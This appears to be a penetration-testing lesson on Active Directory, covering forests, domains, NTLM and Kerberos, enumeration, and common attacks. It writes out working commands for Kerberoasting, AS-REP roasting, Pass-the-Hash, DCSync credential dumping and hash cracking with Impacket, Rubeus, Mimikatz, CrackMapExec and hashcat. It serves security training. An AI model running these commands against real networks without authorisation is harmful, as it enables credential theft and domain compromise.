Active Directory Basics

intermediate50 minWriteup

Introduction to Active Directory

Learning Objectives

  • Understand AD components
  • Learn about domains and trusts
  • Enumerate AD
  • Basic AD attacks

Active Directory (AD) is Microsoft's directory service that manages users, computers, and resources in Windows networks. Understanding AD is essential for enterprise penetration testing - it's the backbone of 95% of Fortune 500 companies!

AD was introduced with Windows 2000 and remains the dominant enterprise identity management system. Even with cloud adoption, hybrid environments mean AD skills remain critical.

AD Structure

1606070;"># Active Directory Hierarchy:
2 
3Forest
4├── Domain (e.g., corp.local)
5│   ├── Organizational Units (OUs)
6│   │   ├── Users
7│   │   ├── Computers
8│   │   └── Groups
9│   ├── Domain Controllers
10│   └── Group Policy Objects (GPOs)
11└── Child Domains
12 
13606070;"># Key concepts:
14606070;"># - Forest: Collection of one or more domain trees
15606070;"># - Domain: Logical grouping of objects
16606070;"># - OU: Container for organizing objects
17606070;"># - DC: Server holding AD database
18606070;"># - GPO: Policy settings applied to users/computers

Domain Naming

Domain names follow DNS format (corp.local, company.com). The ".local" suffix is common in internal networks. Full name with domain is "DOMAIN\username" or "username@domain.local".

AD Objects

1606070;"># Users
2606070;"># - Security principals with SID
3606070;"># - Can authenticate to domain
4606070;"># - Attributes: username, password hash, groups, etc.
5 
6606070;"># Computers
7606070;"># - Also security principals!
8606070;"># - Machine accounts (COMPUTERNAME$)
9606070;"># - Can be compromised for lateral movement
10 
11606070;"># Groups
12606070;"># - Security groups: Assign permissions
13606070;"># - Distribution groups: Email lists only
14 
15606070;"># Key built-in groups:
16606070;"># - Domain Admins: Full domain control
17606070;"># - Enterprise Admins: Forest-wide admin (root domain only)
18606070;"># - Domain Controllers: All DCs in domain
19606070;"># - Domain Users: All domain users
20606070;"># - Domain Computers: All domain computers

Authentication

NTLM Authentication

1606070;"># NTLM (NT LAN Manager) - Legacy but still used
2 
3606070;"># Flow:
4606070;"># 1. Client sends username
5606070;"># 2. Server sends challenge (nonce)
6606070;"># 3. Client encrypts challenge with password hash
7606070;"># 4. Server verifies with DC
8 
9606070;"># NTLM hash format:
10606070;"># LM:NTLM or just NTLM
11606070;"># Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12 
13606070;"># Vulnerabilities:
14606070;"># - Pass-the-Hash (PtH): Use hash without knowing password
15606070;"># - NTLM Relay: Forward authentication to another service
16606070;"># - Credential theft: Extract hashes from memory

Kerberos Authentication

1606070;"># Kerberos - Preferred, ticket-based authentication
2 
3606070;"># Components:
4606070;"># - KDC (Key Distribution Center): Usually on DC
5606070;"># - TGT (Ticket Granting Ticket): "Proof of identity"
6606070;"># - TGS (Ticket Granting Service): "Ticket for specific service"
7 
8606070;"># Authentication flow:
9606070;"># 1. AS-REQ: User requests TGT from KDC
10606070;"># 2. AS-REP: KDC returns encrypted TGT
11606070;"># 3. TGS-REQ: User presents TGT, requests service ticket
12606070;"># 4. TGS-REP: KDC returns service ticket
13606070;"># 5. AP-REQ: User presents ticket to service
14 
15606070;"># Vulnerabilities:
16606070;"># - Kerberoasting: Crack service ticket hashes offline
17606070;"># - AS-REP Roasting: Attack users with pre-auth disabled
18606070;"># - Golden Ticket: Forge TGTs with krbtgt hash
19606070;"># - Silver Ticket: Forge service tickets
Understanding Kerberos is crucial for AD attacks. Most enterprise penetration tests involve Kerberoasting or other ticket-based attacks.

AD Enumeration

bash
1606070;"># From Windows (Domain joined)
2 
3606070;"># Basic domain info
4net user /domain
5net group /domain
6net group 606070;">#a5d6ff;">"Domain Admins" /domain
7 
8606070;"># PowerShell AD Module
9Get-ADUser -Filter *
10Get-ADGroup -Filter *
11Get-ADComputer -Filter *
12Get-ADDomainController -Filter *
13 
14606070;"># PowerView (PowerSploit)
15Import-Module PowerView.ps1
16Get-NetDomain
17Get-NetUser
18Get-NetGroup
19Get-NetComputer
20Get-NetGPO
21Find-LocalAdminAccess
bash
1606070;"># From Linux (remotely)
2 
3606070;"># LDAP enumeration
4ldapsearch -x -H ldap:606070;">//DC_IP -b "DC=corp,DC=local"
5 
6606070;"># RPC enumeration
7rpcclient -U 606070;">#a5d6ff;">"" -N DC_IP
8rpcclient $> enumdomusers
9rpcclient $> enumdomgroups
10 
11606070;"># SMB enumeration
12enum4linux -a DC_IP
13crackmapexec smb DC_IP -u 606070;">#a5d6ff;">'' -p '' --users
14 
15606070;"># BloodHound collection
16bloodhound-python -d corp.local -u user -p password -ns DC_IP -c All

BloodHound

BloodHound visualizes AD relationships and attack paths. It's the fastest way to find paths to Domain Admin. Always run it during AD engagements!

Common AD Attacks

bash
1606070;"># Kerberoasting
2606070;"># Find service accounts and crack their tickets
3 
4606070;"># Impacket
5GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request
6 
7606070;"># Rubeus (Windows)
8Rubeus.exe kerberoast
9 
10606070;"># Crack with hashcat
11hashcat -m 13100 hashes.txt rockyou.txt
bash
1606070;"># AS-REP Roasting
2606070;"># Attack users with "Do not require Kerberos pre-authentication"
3 
4606070;"># Impacket
5GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip DC_IP
6 
7606070;"># Rubeus
8Rubeus.exe asreproast
9 
10606070;"># Crack with hashcat
11hashcat -m 18200 hashes.txt rockyou.txt
bash
1606070;"># Pass-the-Hash
2606070;"># Use NTLM hash instead of password
3 
4606070;"># Impacket
5psexec.py corp.local/administrator@TARGET -hashes :NTLM_HASH
6wmiexec.py corp.local/administrator@TARGET -hashes :NTLM_HASH
7 
8606070;"># CrackMapExec
9crackmapexec smb TARGET -u administrator -H NTLM_HASH
bash
1606070;"># DCSync
2606070;"># Extract all password hashes from DC (requires replication rights)
3 
4606070;"># Impacket
5secretsdump.py corp.local/admin:password@DC_IP
6 
7606070;"># Mimikatz
8lsadump::dcsync /domain:corp.local /user:administrator

Essential AD Tools

1606070;"># Windows:
2606070;"># - Mimikatz: Credential extraction, ticket attacks
3606070;"># - Rubeus: Kerberos attacks
4606070;"># - PowerView: AD enumeration
5606070;"># - SharpHound: BloodHound data collection
6 
7606070;"># Linux:
8606070;"># - Impacket: Python AD attack suite
9606070;"># - BloodHound: Attack path visualization
10606070;"># - CrackMapExec: Swiss army knife for AD
11606070;"># - Responder: LLMNR/NBT-NS poisoning
12 
13606070;"># Both:
14606070;"># - BloodHound: Graph-based analysis
15606070;"># - Hashcat: Password cracking

Knowledge Check

Quick Quiz
Question 1 of 3

What does Kerberoasting target?

Key Takeaways

  • AD manages users, computers, and resources in Windows networks
  • Kerberos is ticket-based; NTLM uses challenge-response
  • Kerberoasting and AS-REP Roasting target weak service account passwords
  • BloodHound visualizes attack paths to high-value targets
  • Domain Admins control one domain; Enterprise Admins control the forest
  • Compromising the krbtgt hash enables Golden Ticket persistence